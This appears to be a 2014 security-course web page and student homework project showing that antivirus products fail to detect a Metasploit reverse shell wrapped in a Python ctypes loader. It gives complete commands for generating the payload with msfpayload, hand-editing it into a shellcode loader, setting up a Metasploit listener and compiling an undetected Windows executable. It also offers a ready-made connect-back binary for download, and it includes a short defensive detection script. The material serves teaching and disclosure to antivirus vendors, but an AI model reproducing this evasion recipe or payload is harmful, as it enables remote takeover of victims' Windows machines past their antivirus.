Antivirus Challenge: Detect This Malware

Update 7-8-14: Evil.exe v. Norton

Here's a simple demonstration of the weakness of AV software: EVIL.EXE Python keylogger.

No AV product detects it at all. When I demonstrated it in Baltimore on 6-24-14, it seemed like Norton detected it, but I just tested it again today (7-8-14) and it was not detected, as shown below:

New 4-28-14: LastLine Detects It!

@ChrisAbdalla_1 tested this sample with LastLine and it detected it correctly as a Metasploit reverse shell:

Violent Python

I am using a simple antivirus evasion technique from the book Violent Python.

Compiled malicious code is stored as data on the disk and loaded into RAM with this Python command:

cast(memory1, CFUNCTYPE(c_void_p))

The Python code is then compiled to an EXE file. That seems to defeat all antivirus engines I can test. So far I have tested Norton, Nod32, Avast, 360 Internet Security, and Kaspersky, as well as using VirusTotal:

http://samsclass.info/124/proj14/norton.htm
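For defenders, the loader pattern just described (a ctypes import, a writable buffer built with create_string_buffer, a cast to a CFUNCTYPE function pointer that is then called, and a large \x-escaped byte blob) is easy to triage statically in Python source or in strings extracted from a PyInstaller bundle. The following script is an added example, not code from this page or from Violent Python; the indicator names, the 64-escape threshold and both sample inputs are constructed for illustration.

```python
import re

# Each indicator is a regex over raw Python source text (constructed example).
INDICATORS = {
    "ctypes_import": re.compile(r"^\s*(from\s+ctypes\s+import|import\s+ctypes)", re.M),
    "string_buffer": re.compile(r"\bcreate_string_buffer\s*\("),
    "func_ptr_cast": re.compile(r"\bcast\s*\([^)]*CFUNCTYPE\s*\("),
    # result of cast(...) assigned to a name that is later called with no arguments
    "call_of_cast": re.compile(r"^\s*(\w+)\s*=\s*cast\s*\(.*\n(?:.*\n)*?\s*\1\s*\(\s*\)", re.M),
}
HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}")
HEX_BLOB_THRESHOLD = 64  # assumed cutoff; a msfpayload stager is far larger than this


def count_hex_escapes(text):
    """Number of \\xNN escapes in the source; large counts suggest an embedded blob."""
    return len(HEX_ESCAPE.findall(text))


def triage_source(text):
    """Return a dict of indicator hits plus an overall 'suspicious' verdict."""
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    hits["hex_blob"] = count_hex_escapes(text) >= HEX_BLOB_THRESHOLD
    # A function-pointer cast plus ctypes is the core of the loader; a blob or
    # writable buffer alongside it raises confidence enough to flag the file.
    hits["suspicious"] = bool(hits["ctypes_import"] and hits["func_ptr_cast"]
                              and (hits["hex_blob"] or hits["string_buffer"]))
    return hits


# Constructed sample mimicking the loader structure; the blob is placeholder bytes, not shellcode.
PLACEHOLDER_BLOB = '"' + "\\x00\\x11" * 40 + '"'  # 80 escaped bytes
SUSPECT_SAMPLE = "\n".join([
    "from ctypes import *",
    "stage1code = (",
    PLACEHOLDER_BLOB,
    ")",
    "memory1 = create_string_buffer(stage1code, len(stage1code))",
    "stage1 = cast(memory1, CFUNCTYPE(c_void_p))",
    "stage1()",
    "",
])
# Constructed benign sample: ordinary ctypes use with no buffer or function-pointer cast.
BENIGN_SAMPLE = "import ctypes\nlibc = ctypes.CDLL(None)\nprint(libc.getpid())\n"

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as f:
            print(path, triage_source(f.read()))
```

Run it over .py files, or over the output of `strings` on a suspect executable, and treat a `suspicious` verdict as a reason to sandbox the file and watch for an outbound TCP connection at launch.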

Malicious EXE File

This binary file, when executed on a Windows target, causes it to connect back to a Metasploit listener at the IP address 192.168.1.89.

rsh-192-168-1-89.exe

It's a 3 MB file. Normally I zip malware with a password, but since no anti-malware product can detect this one, there is at present no reason to bother.

How to Make Your Own Undetectable Malware

This is the project my students do for homework.

What You Need

Purpose

Make a reverse TCP shell exploit with Metasploit, compile it into a Windows executable, and use it to control a Windows target with Norton Antivirus running.

This is a strong demonstration of the weak protection afforded by antivirus.

Networking

Start both your Windows target and your Kali Linux attacker. Make sure you can ping the Kali Linux box from the Windows box. If you want to attack a Windows 7 host running Kali Linux as a virtual machine, use Bridged networking mode.

Generating Malicious Code with Metasploit

In Kali Linux, in a Terminal, execute this command:

ifconfig

Make a note of your Kali Linux box's IP address.

In Kali Linux, in a Terminal, execute these commands, replacing the IP address with the IP address of your Kali Linux box, and "YOURNAME" with your own name (without spaces).

msfpayload windows/shell/reverse_tcp LHOST=192.168.119.132 C > YOURNAME-rsh.py

nano YOURNAME-rsh.py

The file opens in nano, as shown below.

This code is written in C, not in Python, so some additional lines are needed.

Add this line to the top of the file:

from ctypes import *

That imports the library code needed to run a C program from Python.

Remove all the comment lines. TIP: in nano, Ctrl+K deletes a line.

Remove this line:

unsigned char buf[] =

Add this text to the start of the first line of hexadecimal codes:

stage1code = (

Your screen should now look like this:

In nano, use the down-arrow key to find the end of the first block of green hexadecimal codes, as shown below:

Add a closing parenthesis before the semicolon at the end of the first block of green hexadecimal codes, like this:

Add these lines to the end of the first block of green hexadecimal codes:

memory1 = create_string_buffer(stage1code, len(stage1code))

stage1 = cast(memory1, CFUNCTYPE(c_void_p))

stage1()

Your screen should now look like this:

Below the lines you just added, remove all the comment lines.

Remove this line:

unsigned char buf[] =

Add this text to the start of the first line of hexadecimal codes:

stage2code = (

Your screen should now look like this:

In nano, use the down-arrow key to move to the end of the file.

Add a closing parenthesis before the semicolon at the end of the block of green hexadecimal codes, like this:

Add these lines to the end of the second block of green hexadecimal codes:

memory2 = create_string_buffer(stage2code, len(stage2code))

stage2 = cast(memory2, CFUNCTYPE(c_void_p))

stage2()

Your screen should now look like this:

Save the file with Ctrl+X, Y, Enter.

In Kali Linux, in a Terminal, execute this command to copy the file to your Kali desktop:

cp YOURNAME-rsh.py ~/Desktop

Moving the File to your Windows Machine

In Kali Linux, minimize all windows.

Drag the YOURNAME-rsh.py file from the Kali Linux desktop to the desktop of your host system.

If you are not attacking the host, move the file from the desktop of the host system to your target system.

You could also move the file by emailing it.

Starting a Metasploit Listener

Your Kali machine will serve as the Command & Control server for the Windows bot. Therefore it must be listening for bots to call in, requesting commands.

In Kali Linux, in a Terminal, execute these commands:

msfconsole

use exploit/multi/handler

set PAYLOAD windows/shell/reverse_tcp

set LHOST 0.0.0.0

set ExitOnSession false

exploit -j

The payload handler should start, like this:

Preparing your Windows Python Environment

You need Python 2.7, PyWin32, pip-Win, and pyinstaller on your Windows system, as you set it up in the two previous projects, Projects 8 and 9 here:

http://samsclass.info/124/124_S14.shtml#projects

Starting pip-Win

On your Windows machine, click Start. In the Search box, type in pip-Win.

When it finds pip-Win1.6.exe, click it.

In pip-Win1.6, in the Command field, enter

venv pyi-env-name

as shown below:

Click Run.

A command shell opens with your Python development environment.

Testing the Malware

On Windows, in the Command Prompt window, execute this command:

python YOURNAME-rsh.py

You should see a "session opened" message on Kali.

In Kali, execute this command to start interaction with the Windows target:

sessions -i 1

On Kali, you should see a banner saying "Microsoft Windows", as shown below:

Troubleshooting

Wrong Path

If Python cannot find your YOURNAME-rsh.py file, you are in the wrong working directory. Use the CD command to move to the correct directory, which will be something like this:

CD \Users\Administrator\Desktop

Syntax Errors

If you see Python syntax errors on the Windows machine, there are typographical errors in your Python source code.

Open the YOURNAME-rsh.py file on Windows in Wordpad and correct them.

IP Address Errors

If the Python code runs, but no session is opened on Kali Linux, you may have made malware that connects to the wrong address. Open a new Command Prompt window on Windows and try pinging the Kali Linux machine. If the address is wrong, you will have to repeat the whole process to make new exploit code, because the address is encoded in the hexadecimal values and not simple to fix.

VMware Networking Problems

VMware machines running Kali tend to ignore SYN packets and/or send inappropriate RST packets. A simple way to prevent that is to run Wireshark sniffing.

Open a new Terminal window in Kali and execute this command:

wireshark

Start sniffing on your network adapter.

Try the exploit again.

Metasploit Listener Problems

If the session dies with an ECONNRESET error message in Metasploit, use the exit command to stop Metasploit and start the listener again. Restarting Wireshark may also help.

Stopping the Python Exploit

On Windows, close the Command Prompt window running your YOURNAME-rsh.py program.

Starting pip-Win Again

On your Windows machine, in pip-Win1.6, click Run.

A command shell opens with your Python development environment.

Compiling the Malware

On Windows, in the Command Prompt window, execute this command:

pyinstaller --onefile --noconsole YOURNAME-rsh.py

This creates a file named "YOURNAME-rsh.exe" in the "dist" folder on your desktop.

Running the Malware

On your Windows desktop, double-click the dist folder.

Double-click the YOURNAME-rsh.exe file.

You should see a "session opened" message on Kali.

In Kali, execute this command to start interaction with the Windows target:

sessions -i 2

On Kali, you should see a banner saying "Microsoft Windows", as shown below:

Stopping the Malware

In Windows, right-click the taskbar at the bottom of the desktop and click "Start Task Manager". In Task Manager, find the two processes named YOURNAME-rsh.exe, as shown below.

On one of the two YOURNAME-rsh.exe processes, right-click it, click "End Process", and click "End Process" again.

If both "YOURNAME-rsh.exe" processes vanish, you're done. If one is still running, close it the same way.

Adding Norton Antivirus to your Windows Machine

In your Windows machine, open a Browser and go to this URL:

http://goo.gl/BPq4DN

A 30-day trial version of Norton Antivirus downloads.

Install it with the default options.

Update Norton when you are prompted to. Restart your Windows machine if you are prompted to.

When Norton is all updated and running, run its console, so you can see the green "All Threats Resolved" message, as shown below.

Then run the executable again, and establish a remote control session with Kali Linux.

See what Norton does about it. At the time I wrote this, Norton didn't do a thing, as shown below.

Sources

I am grateful for assistance from @info_dox, @NortonSupport, and @ViolentPython in developing this project.

Using meterpreter on local machine without an exploit

Violent Python

Companies Contacted

@NortonSupport in March 2014
April 3, 2014: @FireEye @kaspersky @McAfee_Labs @NortonSupport @ESET @bromium @PaloAltoNtwks @Infoblox @msftsecurity
Posted: 3-24-14 1:57 pm
Rewritten as a challenge to AV companies 4-3-14 10:43 am
List of contacted companies and link to AV tests added 10:51 am 4-3-14
LastLine results added 1:49 pm 4-28-14
Updated 7-8-14 with new Norton results